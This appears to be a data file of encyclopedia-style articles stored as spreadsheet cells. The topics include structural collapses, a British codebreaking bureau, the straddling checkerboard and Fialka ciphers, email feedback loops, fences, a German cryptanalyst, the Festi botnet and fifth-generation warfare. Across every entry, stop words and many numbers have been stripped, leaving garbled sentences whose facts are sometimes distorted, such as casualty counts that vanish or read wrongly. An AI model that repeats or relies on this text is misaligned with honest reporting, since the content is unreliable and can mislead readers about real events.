properties. these failures usually begin cracks form stress points, squared corners bolt holes close material's edge. these cracks grow material repeatedly stressed unloaded (cyclic loading), eventually reaching critical length causing structure suddenly fail normal loading conditions. third type failure caused manufacturing errors, including improper selection materials, incorrect sizing, improper heat treating, failing adhere design, shoddy workmanship. this type failure occur time usually unpredictable. fourth type failure defective materials. this type failure also unpredictable, since material improperly manufactured damaged prior use. fifth cause failure lack consideration unexpected problems. this type failure caused events vandalism, sabotage, natural disasters. also occur maintain construction properly trained overstress structure. notable failures bridges bridge bridge designed robert stephenson, using cast iron girders reinforced wrought iron struts. 1847, collapsed train passed killing five people. collapse subject first formal inquiries structural failure. this inquiry concluded design structure fundamentally flawed, wrought iron reinforce cast iron, casting failed repeated flexing. first rail bridge bridge disaster followed number cast iron bridge collapses, including collapse first rail bridge december 1879. like bridge, collapsed train passed killing people. bridge failed constructed poorly made cast iron, designer thomas bouch failed consider wind loading collapse resulted cast iron replaced steel construction, complete redesign 1890 forth railway bridge, making first entirely steel bridge world. first tacoma narrows bridge 1940 collapse original tacoma narrows bridge sometimes characterized physics textbooks classic example resonance, although description misleading. catastrophic vibrations destroyed bridge simple mechanical resonance, complicated oscillation bridge winds passing known aeroelastic flutter. robert scanlan, leading contributor understanding bridge aerodynamics, wrote article misunderstanding. this collapse, research followed, increased understanding wind/structure interactions. several bridges altered following collapse prevent similar event occurring again. fatality named tubby. i-35w bridge i-35w mississippi river bridge (officially known simply bridge 9340) eight-lane steel truss arch bridge carried interstate across mississippi river minneapolis, minnesota, united states. bridge completed 1967, maintenance performed minnesota department transportation. bridge minnesota's fifth–busiest, carrying 140,000 vehicles daily. bridge catastrophically failed evening rush hour august 2007, collapsing river riverbanks beneath. thirteen people killed injured. following collapse, federal highway administration advised states inspect u.s. bridges similar construction possible design flaw bridge discovered, related large steel sheets called gusset plates used connect girders together truss structure. officials expressed concern many bridges united states sharing design raised questions flaw would discovered years inspections. buildings thane building collapse april 2013, building collapsed tribal land mumbra, suburb thane maharashtra, india. called worst building collapse area: people died, including children, women, men, people survived.the building construction occupancy certificate low- middle-income residents occupants site construction workers families. building reported illegally constructed standard practices followed safe, lawful construction, land acquisition resident occupancy. april, total suspects arrested including builders, engineers, municipal officials, responsible parties. governmental records indicate orders manage number illegal buildings area: 2005 maharashtra state order remote sensing 2010 bombay high court order. complaints also made state municipal officials. april, thane municipal corporation began campaign demolish illegal buildings area, focusing "dangerous" buildings, call center accept track resolutions complaints illegal buildings. forest department, meanwhile, promised address encroachment forest land thane district. savar building collapse april 2013, rana plaza, eight-storey commercial building, collapsed savar, sub-district greater dhaka area, capital bangladesh. search dead ended death toll 1,134. approximately 2,515 injured people rescued building alive.it considered deadliest garment-factory accident history, well deadliest accidental structural failure modern human history.the building contained clothing factories, bank, apartments, several shops. shops bank lower floors immediately closed cracks discovered building. warnings avoid using building cracks appeared ignored. garment workers ordered return following building collapsed morning rush-hour. sampoong department store collapse june 1995, five-story sampoong department store seocho district seoul, south korea collapsed resulting deaths people, another 1,445 trapped. april 1995, cracks began appear ceiling fifth floor store's south wing presence air-conditioning unit weakened roof poorly built structure. morning june, number cracks ceiling increased dramatically, store managers closed floor shut conditioning, failed shut building issue formal evacuation orders executives left premises precaution. five hours collapse, first several loud bangs heard emanating floors, vibration conditioning caused cracks slabs widen further. amid customer reports vibration building, conditioning turned but, cracks floors already grown wide. 5:00 p.m. local time, fifth-floor ceiling began sink, 5:57 p.m., roof gave way, sending conditioning unit crashing already-overloaded fifth floor. ronan point 1968, 22-story residential tower ronan point london borough newham collapsed relatively small explosion 18th floor caused structural wall panel blown away building. tower constructed precast concrete, failure single panel caused entire corner building collapse. panel able blown insufficient reinforcement steel passing panels. this also meant loads carried panel could redistributed adjacent panels, route forces follow. result collapse, building regulations overhauled prevent disproportionate collapse understanding precast concrete detailing greatly advanced. many similar buildings altered demolished result collapse. oklahoma city bombing april 1995, nine-story concrete framed alfred murrah federal building oklahoma struck truck bomb causing partial collapse, resulting deaths people. bomb, though large, caused significantly disproportionate collapse structure. bomb blew glass front building completely shattered ground floor reinforced concrete column (see brisance). second story level wider column spacing existed, loads upper story columns transferred fewer columns girders second floor level. removal lower story columns caused neighbouring columns fail extra load, eventually leading complete collapse central portion building. bombing first highlight extreme forces blast loading terrorism exert buildings, increased consideration terrorism structural design buildings. versailles wedding hall versailles wedding hall (hebrew: אולמי ורסאי), located talpiot, jerusalem, site worst civil disaster israel's history. 22:43 thursday night, 2001 wedding keren asaf dror, large portion third floor four-story building collapsed, killing people. bride groom survived. world trade center towers september attacks, commercial airliners deliberately crashed twin towers world trade center york city. impact resulting fires caused towers collapse within less hours. impacts severed exterior columns damaged core columns, redistributing loads columns carried. this redistribution loads greatly influenced trusses building. impacts dislodged fireproofing steel, increasing exposure heat fires. temperatures became high enough weaken core columns point creep plastic deformation weight higher floors. heat fires also weakened perimeter columns floors, causing floors exerting inward force exterior walls building. building also collapsed later day; story skyscraper collapsed within seconds combination large fire inside building heavy structural damage collapse north tower. champlain towers june 2021, champlain towers south, 12-story condominium building surfside, florida partially collapsed, causing dozens injuries deaths. collapse captured video. person rescued rubble, people rescued june uncollapsed portion building. long-term degradation reinforced concrete-support structures underground parking garage, water penetration corrosion reinforcing steel, considered factor in—or cause of—the collapse. issues reported 2018 noted "much worse" april 2021. a$15 million program remedial works approved time collapse. aircraft repeat structural failures type aircraft occurred 1954, havilland comet airliners crashed decompression caused metal fatigue, 1963–64, vertical stabilizer four boeing b-52 bombers broke mid-air. other warsaw radio mast august 1991 16:00 warsaw radio mast, tallest man-made object ever built erection burj khalifa collapsed consequence error exchanging guy-wires highest stock. mast first bent snapped roughly half height. destroyed collapse small mobile crane mostostal zabrze. workers left mast exchange procedures, fatalities, contrast similar collapse wlbt tower 1997. hyatt regency walkway july 1981, suspended walkways lobby hyatt regency kansas city, missouri, collapsed, killing injuring people dance. collapse late change design, altering method rods supporting walkways connected them, inadvertently doubling forces connection. failure highlighted need good communication design engineers contractors, rigorous checks designs especially contractor-proposed design changes. failure standard case study engineering courses around world, used teach importance ethics engineering. also structural analysis structural robustness catastrophic failure earthquake engineering porch collapse forensic engineering progressive collapse seismic performance serviceability failure structural fracture mechanics collapse zone engineering disasters tofu-dreg project urban search rescue list structural failures collapses references notes citations bibliographyfeld, jacob; carper, kenneth (1997). construction failure. john wiley sons. isbn 0-471-57477-5. lewis, peter (2007). disaster dee. tempus. petroski, henry (1994). design paradigms: case histories error judgment engineering. cambridge university press. isbn 0-521-46649-0. scott, richard (2001). wake tacoma: suspension bridges quest aerodynamic stability. asce publications. isbn 0-7844-0542-5.</t>
  </si>
  <si>
    <t>Far East Combined Bureau</t>
  </si>
  <si>
    <t>east combined bureau, outstation british government code cypher school, hong kong march 1935, monitor japanese, also chinese russian (soviet) intelligence radio traffic. later moved singapore, colombo (ceylon), kilindini (kenya), returned colombo. hong kong fecb located office block naval dockyard, armed guard door (which negated attempt secrecy). intercept site stonecutters island, four miles across harbour, manned dozen ratings (plus later four army signallers). codebreaking section japanese, chinese russian interpreters, paymaster arthur (harry) shaw, dick thatcher neil barnham. fecb headed chief intelligence staff (cois) captain john waller, later captain wylie. shaw dealing direct gc&amp;cs c-in-c east shanghai, found waller expected everything him, paid little regard keeping sources secret. 1936 senior naval officers barely speaking terms. colonel valentine burkhart found arrived 1936 bureau involved “turf wars”, although eventually accepted control intelligence reports. initially section focus three main japanese navy codes cyphers; japanese naval general cypher, flag officer code "tasogare" basic naval reporting code used report sailings individual ships. 1938 section attack japanese commercial systems track supply convoys. from 1936 many messages sent back london, deciphered john tiltman, broke first version jn-25 1939. singapore august 1939, shortly outbreak germany, fecb moved singapore birmingham fear japanese attack. skeleton staff codebreaker (alf bennett) four intercept operators left hong kong, captured japanese christmas 1941. fecb went seletar naval base, intercept station kranji. interception unit, wireless unit, arrived singapore early november 1941. bletchley park concentrating german enigma cyphers, many japanese naval section moved fecb, singapore. 1940 forty people working solely jn-25, could read simple messages. codebook jn-25b introduced december 1940, broken immediately additives changed.there interchange station cast corregidor, better placed intercept messages, fecb could receive combined fleet home waters night. fecb also collaborated army station intercept site fort mckinley near manila. fecb sent american purple machines bletchley park warship. supposed sent warship military transport, trans-shipped durban freighter sussex. ship's master said landed naval store singapore december 1941, naval stores officer denied knowledge hopefully destroyed dumped sea. hollerith tabulating machine (minus part, borrowed indian state railways bombay) arrived safely colombo.fecb also cooperated kamer (room 14), dutch unit bandung technical college java. initially fecb people went fall singapore. lieutenant-commander brouwer rnn, japanese linguist kamer evacuated colombo, kilindini, later colombo, ceylon with japanese advance malay peninsula, army codebreakers went wireless experimental centre delhi, india. codebreakers went colombo, ceylon january 1942, troopship devonshire (with codebreakers' cars deck cargo). pembroke college, indian boys school, requisitioned combined codebreaking wireless interception centre. fecb worked admiral james somerville, commander-in-chief royal navy's eastern fleet. initially bureau wanted move australia, reportedly told director signals communication, lieutenant commander jack newman facilities available. many since baffled told that), though newman "had intention letting british arrive show"; wanted commandeer australia's intercept stations use. kilindini, kenya april 1942 codebreakers colombo moved kilindini near mombasa kenya, japanese task force attack colombo. codebreakers civilian wireless operators left colombo. indian boys school allidina mile outside mombasa overlooking indian ocean requisitioned, hence name allidina.radio reception even worse colombo, strongest japanese signals received. addition, frumel us-australian-british unit based melbourne replaced cast reluctant exchange material. american commander rudolph fabian difficult work with, prejudiced british personality clash eric nave (although nave australian, royal navy officer). there also complaints fabian frumel macarthur's headquarters, although macarthur particularly concerned (see also central bureau). september 1942 kilindini able break japanese merchant shipping code (jn-40), message sent twice extra data. transposition cypher, super-enciphered code like jn-25. they also broke jn-152 simple transposition substitution cypher navigation warnings previously impenetrable jn-167, another merchant shipping cypher. these successes enabled allied forces e.g. submarines attack japanese supply ships, resulted japanese merchant marine suffering cent losses august 1945. return colombo fecb moved back colombo; move began august 1943, advance party arriving ceylon september. eight wren typex operators killed february 1944, ship khedive ismail route kenya ceylon sunk japanese submarine.the location chosen anderson golf course miles colombo hence name anderson. bruce keith wanted up-country site better reception, chief intelligence staff eastern fleet insisted codebreakers within easy reach headquarters. while reception better kilindini, affected nearby power line racecourse aerodrome.in 1950s, gchq developed site could monitor signals direction perkar replace anderson, cost million (equivalent 2021), without explaining purpose ceylon government. following suez ceylon government decided british bases close, believed ceylon bases used refuel british ships involved suez war, perkar facility anderson abandoned within five years. arthur shaw paymaster arthur (harry) shaw royal navy codebreaker fecb hong kong singapore. founded fecb, headed diplomatic section. rank paymaster captain, later lieutenant commander. when language student japan 1920s, achieved 1000 (81%) test british embassy (eric nave 910) other british stations wireless experimental centre, delhi conclusion smith wrote that: only british codebreakers (like john tiltman, hugh foss eric nave) beginning receive recognition deserve breaking japanese codes cyphers. references external links "bletchley park mombasa". coastweek newspapers ltd. retrieved october 2006. sources bou, jean (2012). macarthur's secret bureau: story central bureau. loftus australia: australian military history publications. isbn 978-0-9872387-1-9. dufty, david (2017). secret code-breakers central bureau. melbourne, london: scribe. isbn 9781925322187. elphick, peter: eastern file: intelligence east 1930-1945 (1997 1998, hodder stoughton, london) isbn 0-340-66584-x jenkins, david: battle surface: japan’s submarine australia 1942-44 (1992, random house australia) isbn 0-09-182638-1 smith, michael: emperor’s codes: bletchley park breaking japan’s secret ciphers (2000, bantam london) isbn 0-593-04642-0 smith, michael erskine, ralph (editors): action (2001, bantam london; pages 127-151) isbn 0-593-04910-1 (chapter undervalued effort: british broke japan’s codes michael smith) smith, michael (2015). debs bletchley park. london: aurum press. isbn 978-1-78131-191-2. stripp, alan: codebreaker east (1989, oxford university press) isbn 0-19-280386-7</t>
  </si>
  <si>
    <t>Straddling checkerboard</t>
  </si>
  <si>
    <t>straddling checkerboard device converting alphanumeric plaintext digits whilst simultaneously achieving fractionation simple form information diffusion) data compression relative schemes using digits. also known monôme-binôme cipher. history 1555, pope paul created office cipher secretary pontiff. late 1580s, position held members argenti family, notably giovanni batista nephew, matteo. matteo credited designing called straddling checkerboard cipher. modern times used communist forces spanish civil order protect radio written transmissions. later used basis message-to-digits step cipher. mechanics setup straddling checkerboard something like this: header populated digits, 0-9. they presented order, table, scrambled (based secret value) additional security. second typically eight high-frequency letters (mnemonics english language include; 'estonia-r', er(r)', sir'), leaving blank spots; coordinate first column. remaining rows labeled digits assigned letter second row, filled rest alphabet, plus symbols '/'. period used full stop decimal separator, slash used numeric escape character (indicating numeral follows).similar ordering digits header row, alphabet characters presented order here), scrambled based secret keyword/phrase. enciphering letter-encipherment: encipher letter second simply replaced number labeling column. characters third fourth rows replaced two-digit number representing column numbers (with coordinate written first, i.e. b=20) digit-encipherment: encipher digit, possible methods (which must known/agreed beforehand): single digit escape: encode numerical escape character (i.e. slash '/') letter, write required digit 'in-clear'. this means digit encrypted ciphertext characters; escape character, digit itself. scheme, digit requires escape character encoded double-digit scheme: escape character encoded different digits (e.g. '26' example above), multiple digits encoded writing twice. 'escape' back text escape character used. stream digits encoded escape character. this method cannot used escape character encoded double digit combination. triple-digit scheme: double-digit scheme above, triple digits used. this mechanism used cipher.' example here example using 'attack dawn' resulting message, 3113212731223655, sent directly table scrambled), needs processed additional cipher stages make secure, transposition substitution. simple example, secret number (say, 0452) using modular (non-carrying) arithmetic: optionally, could straddling checkerboard convert ciphertext back letters: deciphering simply reverse processes. although size groups vary, deciphering unambiguous whenever next element deciphered starts pair; otherwise, singleton. letter decoded numerical escape character next digits (depending scheme) interpreted digit. cryptographic properties compression: common characters encoded character, instead two; reduces ciphertext size potentially cipher's proneness frequency attack. fractionation: unlike polybius square (where every character represented pair digits), straddling checkerboard encrypt character number ciphertext digits. this makes harder cryptanalysts determine boundaries plaintext characters. this combined transposition cipher) order locate ciphertext letters plaintext character unknown locations ciphertext. also topics cryptography references external links cipher straddling checkerboards various different versions checkerboards cipher machines cryptology secom, variant extended checkerboard "the rise field ciphers: straddling checkerboard ciphers" greg goebel 2009</t>
  </si>
  <si>
    <t>Feedback loop (email)</t>
  </si>
  <si>
    <t>feedback loop (fbl), sometimes called complaint feedback loop, inter-organizational form feedback mailbox provider (mp) forwards complaints originating users sender's organizations. receive users' complaints placing report spam buttons webmail pages, email client, help desks. message sender's organization, often email service provider, come agreement want collect users' complaints.feedback loops ways reporting spam. whether provide choice users report abuse mailbox provider's reporting hub, also help filtering. alternative, competent users send abuse complaints directly, acting mailbox providers themselves. rationale marketers striving mail delivered twofold advantage: remove subscribers want receive kind advertising (listwashing), analyze complaint rate hence advertising meets market expectations. unsubscribing users complain, marketers reduce overall complaint rate domain, ensuring targeted mail much likely reach subscribers actually want receive it.esps, playing sender's role, sensitive sending mail behalf customers affect reputation. monitoring complaint rate ways control users sending. reporting process spencer sends message alice. alice complains isaac (her message, e.g. hitting report spam button. isaac encapsulates message either abuse reporting format mime part, (less commonly) standalone message/rfc822 mime part, sends spencer spencer signed receive feedback.as sketched above, process implies spencer, besides author sender) message, connected postmaster responsible mail domain. subscribing usually involves postmaster's authorization. subscriber forward abuse reports relevant authors. subscribers exist given mail domain, isaac omit sending abuse report all. fact, subscriptions done one, laborious task mail domains engaged mass mailing want skip. 6650 addresses latter shortcoming proposing auto-subscribe just-in-time fbls, started sending unsolicited abuse report directives minimum, unsubscribe).ipsos noted majority respondents survey spam reporting marked messages spam based solely subject sender data. years, users told trust email unsubscribe links, many users spam button alternative unsubscribing. consequently, report spam unsubscribe cases. reasons unsubscribe links avoid confirming message received opened. reporting formats abuse reporting format (arf) standard format reports. much like bounce messages, whose design inherited arf, abuse report consists human readable part, followed machine readable part, original message. report characterized feedback-type field whose values indicate abuse, fraud, virus, (more types registered iana). microsoft, name junk mail reporting (jmr), also format.google's gmail beta testing non-traditional select esps. gmail uses format—an aggregate report reveals spam rate notable sender. sendgrid reports gmail fbl, developed launched julian tempelsman somanchi, effective identifying spam anti-spam systems miss. criticism report spam button said often used improperly. feedback loops fail meet generic anti-spam criterion generating email messages. even amount feedback fraction number messages sends out, esps organized handling using button abuse reports list unsubscribe implies guesswork (automated) help desk. example, ease reporting list owner specific post (non moderated) list actually spam. some fbls provide option communicating feedback automatically multiple parties: sender, involved), upstream datacenter/network address provider—as currently construed federal trade commission's (ftc) "follow money" strategy. majority offering feedback loop include report email address recipient, marked message. this makes impossible remove recipient mailing list, subscribed. such esps' practice encourages mailing-lists providers send individualized message recipient (contrary sending everybody literally message), mailing list providers extract individualized message coming feedback loop original recipient. also abuse reporting format spam reporting references external links universal feedback loop service messaging anti-abuse working group list fbl´s feedback loop links email providers abuse feedback reporting format (arf)</t>
  </si>
  <si>
    <t>Fence</t>
  </si>
  <si>
    <t>fence structure encloses area, typically outdoors, usually constructed posts connected boards, wire, rails netting. fence differs wall solid foundation along whole length.alternatives fencing include ditch (sometimes filled water, forming moat). types function agricultural fencing, keep livestock and/or predators blast fence, safety device redirects high energy exhaust engine sound barrier acoustic fencing, reduce noise pollution crowd control barrier privacy fencing, provide privacy security temporary fencing, provide safety, security, direct movement; wherever temporary access control required, especially building construction sites perimeter fencing, prevent trespassing theft and/or keep children pets wandering away. decorative fencing, enhance appearance property, garden landscaping boundary fencing, demarcate piece real property newt fencing, amphibian fencing, drift fencing turtle fence, fence plastic sheeting similar materials restrict movement amphibians reptiles. pest-exclusion fence fence, underground fence containment pool fence snow fence school fence balustrade railing fence prevent people falling edge, commonly found stairway, landing, balcony. railing systems balustrades also used along roofs, bridges, cliffs, pits, bodies water. construction brushwood fencing, fence made using wires either side brushwood, compact brushwood material together. chain-link fencing, wire fencing made wires woven together close boarded fencing, strong robust fence constructed mortised posts, arris rails vertical feather edge boards expanding fence trellis, folding structure made wood metal scissor-like pantograph principle, sometimes temporary barrier ha-ha sunken fence) hedge, including: cactus fence hedgerows intertwined, living shrubs (constructed hedge laying) live fencing live woody species fences turf mounds semiarid grasslands western united states russian steppes hurdle fencing, made moveable sections pale fence, composed pales vertical posts embedded ground, exposed typically tapered shed water prevent moisture entering end-grain wood joined horizontal rails, characteristically three courses. also known "post rail" fencing. palisade, stakewall, made vertical pales placed side side embedded ground typically sharpened, provide protection; characteristically courses waler added interior side reinforce wall. picket fences, generally waist-high, painted, partially decorative fence roundpole fences, similar post-and-rail fencing closely spaced rails, typical scandinavia areas rich timber. slate fence, type palisade made vertical slabs slate wired together. commonly used parts wales. split-rail fence, made timber, often laid zig-zag pattern, particularly newly settled parts united states canadavaccary fence (named latin vaca cow), restraining cattle, made thin slabs stone placed upright, found various places north suitable stone had. vinyl fencing solid fences, including: dry-stone wall rock fence, often agricultural stockade fence, solid fence composed contiguous closely spaced round half-round posts, stakes, typically pointed top. scaled version palisade wall made logs, commonly used privacy. wattle fencing, split branches woven stakes. wire fences smooth wire fence barbed wire fence electric fence woven wire fencing, many designs, fine chicken wire heavy mesh "sheep fence" "ring fence" welded wire mesh fence wood-panel fencing wrought iron fencing, also known ornamental iron legal issues developed areas fencing regulated, variously commercial, residential, agricultural areas. height, material, setback, aesthetic issues among considerations subject regulation. required following types areas facilities often required fenced safety security reasons: facilities open high-voltage equipment (transformer stations, mast radiators). transformer stations usually surrounded barbed-wire fences. around mast radiators, wooden fences used avoid problem eddy currents. railway lines united kingdom) fixed machinery dangerous mobile parts (for example merry rounds entertainment parks) explosive factories quarry stores most industrial plants airfields airports military areas prisons construction sites zoos wildlife parks pastures containing male breeding animals, notably bulls stallions. open-air areas charge entry amusement equipment pose danger passers-by swimming pools spas history servitudes legal arrangements land arising private agreements. under feudal system, land england cultivated common fields, peasants allocated strips arable land used support needs local village manor. sixteenth century growth population prosperity provided incentives landowners land profitable ways, dispossessing peasantry. common fields aggregated enclosed large enterprising farmers—either negotiation among another lease landlord—to maximize productivity available land contain livestock. fences redefined means land used, resulting modern servitudes. united states, earliest settlers claimed land simply fencing later, american government formed, unsettled land became technically owned government programs register land ownership developed, usually making land available prices free, owner improved property, including construction fences. however, remaining vast tracts unsettled land often used commons, american west, "open range" degradation habitat developed overgrazing tragedy commons situation arose, common areas began either allocated individual landowners mechanisms homestead desert land fenced kept public hands, leased individual users limited purposes, fences built separate tracts public private land. united kingdom generallyownership fence boundary varies. last relevant original title deed(s) completed seller's property information form document side installed fence respectively; first using marks/symbols (the side denotes owner); latter ticked best last owner's belief duty, conventionally agreed conveyancing process stresses, make detailed, protracted enquiry. commonly mesh panelling mid-position. otherwise tends non-owner's side fence owner might access posts repairs needed legal requirement. where estate planners wish entrench privacy close-boarded fence equivalent well-maintained hedge minimum height stipulated deed. beyond standard height planning permission necessary. hedge ditch ownership presumptionwhere rural fence hedge cases had) adjacent ditch, ditch normally ownership hedge fence, ownership boundary edge ditch furthest fence hedge. principle rule owner digging boundary ditch normally edge land, must pile spoil side ditch avoid trespassing neighbour. they erect fence hedge spoil, leaving ditch side. exceptions exist law, example plot land derives subdivision larger along centre line previously-existing ditch feature, particularly reinforced historic parcel numbers acreages beneath used tally total administrative units confirm actual size holdings, rare instance ordnance survey maps often provide circumstantial evidence namely feature considered boundary. fencing livestockon private land united kingdom, landowner's responsibility fence livestock conversely, common land, surrounding landowners' duty fence common's livestock large parts forest. large commons livestock roaming greatly reduced 18th 19th century acts enclosure commons covering local units, remaining land uk's national parks. united states distinctly different land ownership fencing patterns arose eastern western united states. original fence laws east coast based british common system, rapidly increasing population quickly resulted laws requiring livestock fenced west, land ownership patterns policies reflected strong influence spanish tradition, plus vast land area involved made extensive fencing impractical mandated growing population conflicts landowners. "open range" tradition requiring landowners fence unwanted livestock dominant rural west late 20th century, even today, isolated regions west still open range statutes books. more recently, fences generally constructed surveyed property line precisely possible. today, across nation, state free develop laws regarding fences. many cases rural urban property owners, laws designed require adjacent landowners share responsibility maintaining common boundary fenceline. today, however, states retained provision. some u.s. states, including texas, illinois, missouri, north carolina, enacted laws establishing purple paint markings fences trees) legal equivalent trespassing" signs. laws meant spare landowners, particularly rural areas, continually replace printed signs often stolen obliterated elements. cultural value fences value fences metaphorical significance fence, positive negative, extensively utilized throughout western culture. examples include: "good fences make good neighbors." proverb quoted robert frost poem "mending wall" good neighbour fellow smiles back fence, climb it." arthur baer "there something jumping horse fence, something makes feel good. perhaps risk, gamble. event thing need." william faulkner "fear highest fence." dudley nichols fenced withheld." kurt tippett "what done earth? what done fair sister? ravaged plundered ripped stuck knives side dawn tied fences dragged down." morrison, doors "don't fence cole porter "you shall build turtle fence." peter hoekstra woman's dress like barbed-wire fence: serving purpose without obstructing view." sophia loren also agricultural fencing electric fence wire obstacle temporary fencing post pounder synthetic fence pool fence separation barrier border barrier brushwood fencing fencing (computing) zariba notes references encyclopædia britannica (1982). fence. elizabeth agate: fencing, british trust conservation volunteers, isbn 0-946752-29-x external links media related fences wikimedia commons</t>
  </si>
  <si>
    <t>Ferdinand Voegele</t>
  </si>
  <si>
    <t>ferdinand voegele (born february 1896 hollfeld, kingdom bavaria; died 1946) german philologist linguistic cryptanalyst, time world would eventually lead cipher bureau luftwaffe signal intelligence service (german: oberbefehlshaber luftwaffe). life during world served volunteer. later studied oriental languages various german universities, finally specializing philology. using language skills, started work export business. eventually moving abroad several years, returned summer 1935, offered position interpreter german ministry. military work between july september 1935, undertook training near kladow, near berlin morse telegraphy (wireless telegraphy), german cryptographic procedures radio communications. october 1935, posted fixed intercept station army stuttgart january 1936. during time there, translated plain-language radio messages french army force. addition, employed evaluation traffic analysis. between march april 1936, ordered two-month maneuver employed airborne radio operators kg254 kitzingen. grade time officer candidate. first success from october succeeded breaking recipherment used conjunction french digit code, basis already largely reconstructed. after start spanish civil solved many 4-alphabetic substitution ciphers.on october, voegele transferred luftwaffe intercept station (codename:w-15) (stadelheim transmitter) close munich, translated french, italian yugoslavia intercepts. chi-stelle january 1937, assigned newly created cipher bureau (german: chi-stelle) within referat made chief cryptanalytic work (cryptanalysis) january 1937. assigned assistant, edward lingen learned russian army cryptanalysis german army intercept station treuenbrietzen. when voegele joined chi-stelle consisted people. during remainder year, voegele worked spanish cyphers part monitoring republicans spanish civil war. also worked several czechoslovakian bigraphic procedures (polygraphic substitution), breaking czechoslovakian force double-transposition, message count amounted 10-25 messages day.voegele known worked number cyphers course war. these included government telegraph code, india code, syko, 4-digit code, aircraft movement code autumn 1942, bomber code winter 1942, january 1943, slidex 1943, aircraft reporting code july 1943, weather code 1944 weather codes throughout war. typex attempted voegele early 1940s. little known ferdinand voegele war. references</t>
  </si>
  <si>
    <t>Festi botnet</t>
  </si>
  <si>
    <t>festi botnet, also known alias spamnost, botnet mostly involved email spam denial service attacks. history operations festi botnet first discovered around autumn 2009. time estimated botnet consisted roughly 25000 infected machines, spam volume capacity roughly billion spam emails day. more recent estimates dated august 2012 display botnet sending spam 250000 unique addresses, quarter total amount million detected ip's sending spam mails. besides capable sending email spam, research festi botnet demonstrated also capable performing denial service attacks. also malware internet crime internet security references external links analysis festi botnet eset</t>
  </si>
  <si>
    <t>Fialka</t>
  </si>
  <si>
    <t>cryptography, fialka (m-125) name cold war-era soviet cipher machine. rotor machine, device uses rotors, contacts along mechanical pins control stepping. also makes punched card mechanism. fialka means "violet" russian. information regarding machine quite scarce 2005 device kept secret.fialka contains five-level paper tape reader right hand side front machine, paper tape punch tape printing mechanism top. punched-card input keying machine located left hand side. fialka requires volt power comes separate power supply accepts power vac, 50–400 means external selector switch.the machine's rotors labelled cyrillic, requiring points rotors; contrast many comparable western machines 26-contact rotors, corresponding latin alphabet. keyboard, least examples east german origin, cyrillic latin markings. there least versions known exist, m-125-mn m-125-3mn. m-125-mn typewheel could handle latin cyrilic letters. m-125-3mn separate typewheels latin cyrilic. m-125-3mn three modes, single shift letters, double shift letters symbols, digits only, code books superencrypt numeric ciphers. encryption mechanism fialka rotor assembly rotors mounted axle commutator 30x30). commutator consists sets contact strips right angles other. punched card placed sets contacts door left hand side unit. each punched card holes, exactly hole column pair, thereby specifies permutation rotor contact lines. this feature comparable plug board enigma machine. triangular plate used enter null permutation testing purposes. there types rotors: disassemblable (zerlegbar) rotors, used m-125-3mn. rotorset name "proton." disassemblable rotors consist insert electrical contacts scramble wiring, outer ring mechanical pins whose presence absence control rotor stepping. part setup, stepping control pins rotated relative outer ring. inner, electrical ring also rotated relative outer ring inserted ways, side side unitary rotors, used m-125-mn. these electrical contacts mechanical pins. adjustment order rotors axle initial rotor settings. there combination disassemblable rotors compatible unitary rotor. east german manual become public contains typed-in hand written addenda suggest east germans, least, later stopped using added features disassemblable rotors used unitary compatibility mode.adjacent rotors step opposite directions. spare rotor assembly could kept unit's cover. fialka machines originally delivered sets rotors, machine assemblage supplied metal cylinder inside dustcover. singly crucial flaw enigma design letter substitutions reciprocal particular letter could never encrypt itself. russians clearly learned designing fialka possible letter encrypt itself. keying material keying material fialka consists daily book, message book message identifier book broadcast traffic. daily book contains keys month. consists table cyrillic) punched card. fixed rotor systems, table specifies order rotors axle initial rotor settings used decrypt indicator broadcast messages. name implies, valid (has cryptoperiod parlance) hours changed 00:01 hours. disassemblable rotors, table also specifies electrical insert outer rotor, side orientation insert relative outer rotor. here sample m-125-3nm table 14th month: иджза вкбге ocahe ptбве бдвиа гезкж 2ii22 i22i2 кулкю ыхвугthe message table contained initial rotor settings used message. message never used once. keying material distributed foil-covered package, daily tables punched cards fan-folded pouch perforations item. tables side pouch. design measures information leakage design factors various cryptographic devices result physical leakage information compromise security system varying degrees (see tempest), following describe appropriate counter measures taken design fialka. power supply unit fialka draws differing amounts current depending (5-bit) encoded letter printed paper punched. power supply plugged mains would opportunity small power fluctuations observed eavesdropper. order mask mains supplied power fluctuations data cable back fialka machine power supply unit indicating letter output allowing supply compensate differing loads. supply designed compensating circuit five artificial load resistors would powered depending signal feedback cable. comparison rotor machines fialka design seems derive swiss nema, nema electrical rotors fialka's nema lacks punched card commutator equivalent, plug board. fialka seems comparable u.s. kl-7 eight electrical rotors also lacks commutator, keyboard permutor switch eliminated need reflector, proved weakness enigma system. also enigma nema references further reading borshchevskaya, anna (april 2019). "the soviets' unbreakable code: hidden history fialka espionage machine". foreign policy. retrieved 2021-12-03. matthew (n.d.). "fialka: bigger, better, russian enigma". wonders marvels. retrieved 2021-12-03. national people's army (december 1978). "m-125 operation (nutzung) manual, 040/1/321" (pdf) german). german democratic republic. retrieved 2021-12-03. scanned perera. perera, tom; hamer, david (2005). "general introduction: russian cold m-125 m-125-3mn fialka cipher machines". www.w1tp.com. enigma museum. retrieved 2021-12-03. external links m-125-3 fialka cipher machine german museum berlin russian fialka violet 10-rotor device nick gessler russian m-125 fialka jerry proc simulation m125mn m125-3mn find</t>
  </si>
  <si>
    <t>Fifth-generation warfare</t>
  </si>
  <si>
    <t>fifth-generation warfare (5gw) warfare conducted primarily non-kinetic military action, social engineering, misinformation, cyberattacks, along emerging technologies artificial intelligence fully autonomous systems. fifth generation warfare described daniel abbot "information perception". there widely agreed upon definition fifth-generation warfare, rejected scholars, including william lind, original theorists fourth-generation warfare. history term 'fifth-generation warfare' first used 2003 robert steele. following year, lind criticised concept, arguing fourth generation fully materialize.in 2008, term used terry terriff, presented 2003 ricin letters potential example, stated entirely sure fifth-generation attack, claiming recognize resolves around might look several alternative futures fifth generation." terriff argued fifth-generation warfare allows "super-empowered individuals" make political statements terrorism, lack political power actually demands met. characteristics alex schmid said fifth-generation warfare typified "omnipresent battlefield", fact people engaged necessarily military force, instead employing mixture kinetic non-kinetic force. 1999 book unrestricted warfare, colonels qiao liang wang xiangsui people's liberation army, noted years since 1991 gulf war, conventional military violence decreased, correlated increase "political, economic, technological violence", argued could devastating conventional war. contrary, thomas barnett believes effectiveness fifth-generational warfare exaggerated, terrorism conducted individuals, timothy mcveigh kaczynski, lacks support organized movements. this seconded george michael, noted united states, gang violence responsible deaths lone wolf terrorist attacks.l.c. rees described nature fifth generation warfare difficult define itself, alluding third science fiction author arthur clarke "any sufficiently advanced technology indistinguishable magic." also counterinsurgency generation warfare radicalism (politics) subversion 